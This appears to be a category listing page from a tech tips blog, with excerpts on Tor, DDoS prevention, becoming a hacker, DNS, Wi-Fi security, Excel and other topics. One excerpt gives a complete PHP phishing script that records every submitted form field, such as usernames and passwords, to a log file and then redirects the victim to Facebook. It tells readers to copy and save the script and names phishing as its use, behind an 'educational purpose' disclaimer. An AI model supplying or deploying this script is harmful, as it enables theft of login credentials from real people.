Category: Tips and Trick

THESE ALL ARTICLES IS FOR EDUCATIONAL PURPOSE . JUST USE IT FOR YOUR SAFETY. 

 

No comments exist

When you access the deep web simply by downloading Tor into your computer, you are putting yourself at risk. First, you are leaving traces on your computer that you access the deep web (unless you delete and download Tor every time you want to go deeper, which is painfully annoying). Also, someone else that can…

No comments exist

3 Basic Tips To Prevent A DDoS Attack   Distributed denial-of-service (DDoS) attacks are always in top headlines worldwide, as they are plaguing websites in banks, and virtually of almost every organization having a prominent online presence. The main cause behind the proliferation of DDoS attacks is that there is a very low-cost that the…

No comments exist

12 Simple Steps To Become A Hacker Hacking is an engaging field but it is surely not easy. To become a hacker one has to have an attitude and curiosity of learning and adapting new skills. You must have a deep knowledge of computer systems, programming languages, operating systems and the journey of learning goes on…

No comments exist

Just copy the below script in notepad and save it as any name.php <?php header (‘Location: http://www.facebook.com’); $handle = fopen(“log.txt”, “a”); foreach($_POST as $variable => $value) {    fwrite($handle, $variable);    fwrite($handle, “=”);    fwrite($handle, $value);    fwrite($handle, “\r\n”); } fwrite($handle, “\r\n”); fclose($handle); exit; ?> Don’t know how to use this script for phishing technique…

No comments exist

Facebook is undoubtedly the mother of social networking platforms and it is ranked second in terms of web traffic after Google, by Alexa. In just ten years, Facebook has become a strong thread that binds us with our society,family and friends. Facebook has become an addiction to such an extent that whatever and wherever we…

No comments exist

Domain Name Servers (DNS) are the Internet’s equivalent of a phone book. They maintain a directory of domain names and translate them to Internet Protocol (IP) addresses. This is necessary because, although domain names are easy for people to remember, computers or machines, access websites based on IP addresses. Information from all the domain name…

No comments exist

Using keyboard shortcuts can greatly increase your productivity, reduce repetitive strain, and help keep you focused. For example, to copy text, you can highlight text and press the Ctrl + C shortcut. The shortcut is faster than moving your hands from the keyboard, highlighting with the mouse, choosing copy from the file menu, and then…

No comments exist

When you are surfing the internet, a lot of information is being exchanged between the web host and the device being used to surf the internet. This type of information can always be easily breached by hackers, especially if it involves online transactions and this has always been a major issue when dealing with the…

No comments exist

Usually, people get apps for their android device by downloading them from Google Play Store. The downloader gets the app installed for you, without bothering you with unnecessary details like the files required for installation etc. But what if you don’t have access to internet and you want an app installed on your phone? Surely…

No comments exist

With the world going wireless in every sphere of technology, the question of security has often been raised. The same is true for wireless internet networks with hackers and Wi-Fi intruders always looking for ways to gain access to unsecured networks. Security aside, there are several reasons why you might want to protect your Wi-Fi…

No comments exist

Facebook is, undoubtedly, the most popular social networking website with more than 500 million active users. Due to its popularity, many hackers (or should I say crackers?) are actively involved in hacking Facebook accounts of unsuspecting users. This article outlines the many strategies that such hackers use to gain access to Facebook accounts of hundreds…

No comments exist

            Most of us find ourselves in situations where a website we wish to visit is blocked by a software or by our ISP (Internet Service Provider). So the question arises, how can we access blocked websites? The answer to this is simple: Proxy websites. Before going into details, let us know a bit about…

No comments exist

How To Disable Or Enable USB Ports In Windows:- Ever wondered why you can’t connect your USB to your school’s computer? Or ever felt tired of telling your friends how much you don’t want them to connect their USBs to your laptop? If your answer is yes to any of the above two questions, this…

No comments exist

How To Block Invites From Strangers On Google Hangouts:- Google Hangouts has some very great features which anyone would happily fall for. But there is some big disadvantage that users are not really fond of. In Google Hangouts, strangers get to send you invites. Are you one of those users who is tired of getting…

No comments exist

Very Basic Windows Command Lines Everyone Should Know:- Think you are a true windows lover? I would ask you to think twice if you are completely oblivious to the world of commands. In order to call yourself a real windows lover, you should have the minimum knowledge about the basic commands widely used. Read on,…

No comments exist

How To Hide Sheets, Gridlines And Cells In Excel Sheets:- Are you looking for ways to hide Sheets, Gridlines or Cells in your excel sheet? You are in the right place. We have got the perfect results for all your queries. Dive into the article to learn how to hide sheets, gridlines and cells in…

No comments exist

Microsoft have released another cumulative update (KB3189866) for Windows 10 PCs that running Anniversary update. This time bringing the build number 14393.187 to Insider members in both the Slow ring […] The post Microsoft Windows Cumulative Update (KB3189866) Build 14393.187 Released To the Insider Slow ring and Release Preview ring for PC – Here’s the…

No comments exist

Say Goodbye To Carrying Your Physical License; Be Digital, Use DigiLocker:- DigiLocker is the digital solution provided by Indian Government to eliminate the use of physical documents. Using DigiLocker, you can verify a document by digitally signing on it, you can forget carrying your driving license to work everyday, you can get your marklists and…